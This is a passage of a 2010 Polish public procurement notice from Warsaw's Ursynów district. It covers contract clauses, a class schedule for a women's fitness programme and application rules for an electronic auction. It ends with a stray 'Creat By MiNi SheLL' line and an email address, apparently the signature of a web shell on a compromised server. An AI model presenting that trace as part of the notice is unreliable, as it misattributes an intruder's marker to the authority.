Wszelkie zmiany postanowień zawartych w niniejszej Umowie wymagają obustronnej zgody i sporządzenia pisemnego aneksu - pod rygorem nieważności. Forma pisemna po rygorem nieważności dotyczy także oświadczeń składanych w związku w wykonywaniem umowy.
§ 12
Umowę niniejszą sporządzono w trzech jednobrzmiących egzemplarzach, w tym dwa dla Zamawiającego i jeden dla Wykonawcy.
Załącznik nr 1 do Umowy 
Harmonogram prowadzenia programu rekreacyjno-ruchowych zajęć z elementami aerobicu, fitness i gimnastyki przeznaczonego dla kobiet w średnim wieku pn Trzymaj Formę zaplanowanego do realizacji na terenie Dzielnicy Ursynów m.st. Warszawy w dniach od 29 marca do 25 czerwca 2010 r. oraz od 1 września do 17 grudnia 2010 r.
Szkoła Podstawowa nr 81, ul. Puszczyka 6, Warszawa
Grupa nr 1:  wtorki i czwartki, godzina 19.00 - 20.00
Grupa nr 2: wtorki i czwartki, godzina 20.00 - 21.00
Grupa nr 3: środa i piątek , godzina 18.00 - 19.00
Szkoła Podstawowa nr 96, ul. Sarabandy 16/22, Warszawa
Grupa nr 4:  poniedziałek i czwartek, godzina 19.00 - 20.00
Grupa nr 5: poniedziałek i czwartek, godzina 20.00 - 21.00
Szkoła Podstawowa nr 343, ul. Kopcińskiego 7, Warszawa
Grupa nr 6: wtorki i piątki, godzina 19.00 - 20.00
Grupa nr 7: wtorki i piątki, godzina 20.00 -21.00
Szkoła Podstawowa nr 323, ul. Warchałowskiego 4, Warszawa  
Grupa nr 8 : wtorek i czwartek, godzina 19.00 - 20.00
Grupa nr 9: wtorek i czwartek, godzina 20.00 - 21.00
Szkoła Gimnazjalna nr 92, ul. Koncertowa 4, Warszawa
Grupa nr 10: poniedziałek, godz. 19.00 - 20.00 i środa, godz. 20.00 - 21.00
Grupa nr 11: poniedziałek, godz. 20.00 - 21.00 i piątek, godz. 20.00 - 21.00

Załącznik nr 2 do umowy - formularz cenowy dostępny jest w PDF na stronie internetowej www.ursynow.waw.pl</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Sposób porozumiewania się Zamawiającego z Wykonawcami
a) Wszelkie oświadczenia, zawiadomienia oraz informacje przekazywane są za pomocą faksu (przy czym zawsze dopuszczalna jest forma pisemna), natomiast wnioski wraz z załącznikami przekazywane są w formie pisemnej.
b) Zamawiający i Wykonawcy od momentu otwarcia do momentu zamknięcia licytacji przekazują wnioski, oświadczenia i inne informacje drogą elektroniczną.
c) Osobami uprawnionymi do kontaktu z Wykonawcami są:
- w zakresie dotyczącym przedmiotu zamówienia:
Pan Piotr Nietz 
tel. 022/545-72-78  fax 022/ 545-72-74
Pan Michał Szpakiewicz
tel. 022/ 545-72-76
- w zakresie dotyczącym zagadnień formalno-prawnych:
Pani Aneta Gołębiewska - podinspektor 
tel. 022/ 545-74-91  fax 022/ 545-73-32
- w zakresie dotyczącym licytacji elektronicznej 
Pan Ryszard Jóźwik
tel. 022 443-14-09 fax: 022 443-14-02

2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
2.1. Oświadczenie wymienione w pkt III. 4.1) Ogłoszenia w zakresie: art. 22 ust. 1 pkt 1-4 ustawy Pzp Wykonawcy wspólnie ubiegający się o udzielenie zamówienia składają wspólnie (przez umocowanego Pełnomocnika), potwierdzając, iż określone przez Zamawiającego warunki spełniają razem.
2.2. Dokumenty wymienione w pkt III. 4.1) Ogłoszenia winien przedłożyć jeden albo więcej Wykonawców wspólnie ubiegających się o udzielenie zamówienia, tak aby potwierdzić łącznie spełnianie warunku, którego dotyczy.
2.3. Oświadczenie o braku podstaw do wykluczenia wymienione w pkt. III. 4.2) Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna, tak aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia. Zamawiający dopuszcza, aby niniejszy dokument został złożony wspólnie przez wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, lecz w takiej sytuacji na niniejszym dokumencie wymagany jest podpis każdego uprawnionego przedstawiciela Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia. 
2.4. Dokument wymieniony w pkt III. 4.2) Ogłoszenia winien przedłożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia z osobna, tak aby samodzielnie potwierdzić brak podstaw do wykluczenia z postępowania o udzielenie zamówienia.
3. Opis sposobu przygotowywania wniosku
3.1. Wniosek musi zawierać:
3.1.1. Wypełniony formularz wniosku, zgodny z treścią załącznika nr 1 do Ogłoszenia, zamieszczonego na stronie internetowej Zamawiającego - www.ursynow.waw.pl 
3.1.2. Oświadczenia i dokumenty, wymagane postanowieniami pkt. III. 4.1), III. 4.2), oraz odpowiednio wymagane postanowieniami pkt. III 4.3.1), III.6), potwierdzające spełnienie przez Wykonawcę warunków udziału w postępowaniu, oraz potwierdzające brak podstaw do wykluczenia z postępowania.
Uwaga: 
Odnosząc się do dokumentu, wyszczególnionego w pkt. III. 4.2) Ogłoszenia - w stosunku do osób fizycznych, zamiast oświadczenia w zakresie art. 24 ust. 1 pkt 2 ustawy PZP - za wystarczające uzna się złożone oświadczenie, o którym mowa w pkt. III. 4.2).

3.1.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Niniejsze pełnomocnictwo musi określać: temat postępowania, którego dotyczy pełnomocnictwo, wykonawców (nazwy i dokładne adresy) ubiegających się o udzielenie zamówienia, wskazanie Wykonawcy - pełnomocnika, zakres umocowania. Pełnomocnictwo musi być podpisane przez wszystkich uprawnionych Wykonawców występujących wspólnie oraz załączone do wniosku w formie oryginału lub kopii  poświadczonej za zgodność z oryginałem przez notariusza.
UWAGA!
W przypadku spółki cywilnej, której wspólnicy traktowani są jako Wykonawcy ubiegający się wspólnie o zamówienie - jeżeli forma reprezentacji nie wynika z innych dokumentów załączonych do wniosku - zobligowani są załączyć powyżej wyszczególnione pełnomocnictwo. 
3.1.4. Jeżeli wniosek oraz załączniki, oświadczenia i dokumenty zostaną podpisane przez osobę albo osoby działające na podstawie pełnomocnictwa, do wniosku należy załączyć właściwe pełnomocnictwo w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza
3.2.Wniosek musi być sporządzony w języku polskim. Każdy dokument składający się na wniosek i sporządzony w języku obcym musi być złożony wraz z jego tłumaczeniem na język polski, poświadczonym przez Wykonawcę. 
3.3. Wniosek oraz wszystkie załączniki, oświadczenia i dokumenty, wymagające podpisu   Wykonawcy, muszą być podpisane, przez osoby uprawnione do reprezentowania Wykonawcy w obrocie gospodarczym, zgodnie z aktem rejestracyjnym i wymaganiami ustawowymi. 
3.4. Wszelkie poprawki w treści wniosku muszą być naniesione czytelnie oraz opatrzone podpisem osoby podpisującej wniosek.
3.5.Dokumenty (z wyłączeniem pełnomocnictw oraz oświadczenia, o którym mowa poniżej) składane są w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
3.6. Oświadczenie, w zakresie art. 22 ust. 1 pkt. 1 - 4 ustawy PZP oraz oświadczenie o braku podstaw do wykluczenia, składane są w formie oryginału.
3.7.Zamawiający zaleca, aby strony wniosku były trwale ze sobą połączone i kolejno ponumerowane,  z zastrzeżeniem sytuacji opisanej w pkt. 3.8 Ogłoszenia. 
3.8.W przypadku gdyby wniosek, załączniki, oświadczenia lub dokumenty zawierały informacje, stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, Wykonawca winien w sposób nie budzący wątpliwości zastrzec, które informacje stanowią tajemnicę przedsiębiorstwa. Informacje te winny być umieszczone w osobnym opakowaniu, strony zaś trwale ze sobą połączone i ponumerowane. 
3.9. Zastrzeżenie, o którym mowa w pkt 3.8., musi zostać załączone odrębnie do wniosku, lecz w tym samym opakowaniu co wniosek.
4. Miejsce i termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej
4.1.	Wniosek należy złożyć w siedzibie Zamawiającego przy Al. KEN 61 w  Wydziale Sportu i Rekreacji  pok. nr 551, do dnia  17.03.2010 r. do godz. 10:00.
4.2.	Koperta ma być zaadresowana następująco:
URZĄD MIASTA STOŁECZNEGO WARSZAWY
URZĄD DZIELNICY URSYNÓW
WYDZIAŁ SPORTU i REKREACJI
Al. KEN 61, 02-777 Warszawa
Wniosek w licytacji elektronicznej na:
Zorganizowanie i przeprowadzenie programu rekreacyjno-ruchowych zajęć z elementami aerobicu, fitness i gimnastyki przeznaczonego dla kobiet w średnim wieku pn. Trzymaj Formę
4.3.	W przypadku błędnego oznakowania przez Wykonawcę koperty, Zamawiający nie poniesie z tego tytułu żadnych sankcji.
5. Informacje o formalnościach, jakie powinny zostać dopełnione po wyborze oferty w celu zawarcia
umowy w sprawie zamówienia publicznego
5.1.Wykonawca/y, którego/ych oferta zostanie uznana za najkorzystniejszą, zobowiązany/i będzie/ą najpóźniej w dniu podpisania umowy złożyć Zamawiającemu: 
a) formularz cenowy, o którym mowa w pkt IV.4.9) 5 Ogłoszenia. 
5.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani będą nie później niż w dniu podpisania umowy przedłożyć Zamawiającemu - umowę regulującą zasady ich współpracy, współdziałania, odpowiedzialności.
6.Wykonawca nie może zlecić Podwykonawcom wszystkich rodzajów prac objętych niniejszym zamówieniem. 
Zamawiający żąda od Wykonawcy wskazania we wniosku części zamówienia, którą zamierza powierzyć Podwykonawcom. 
7. Wzór wniosku wraz z załącznikami dostępny jest w formacie PDF na stronie www.ursynow.waw.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com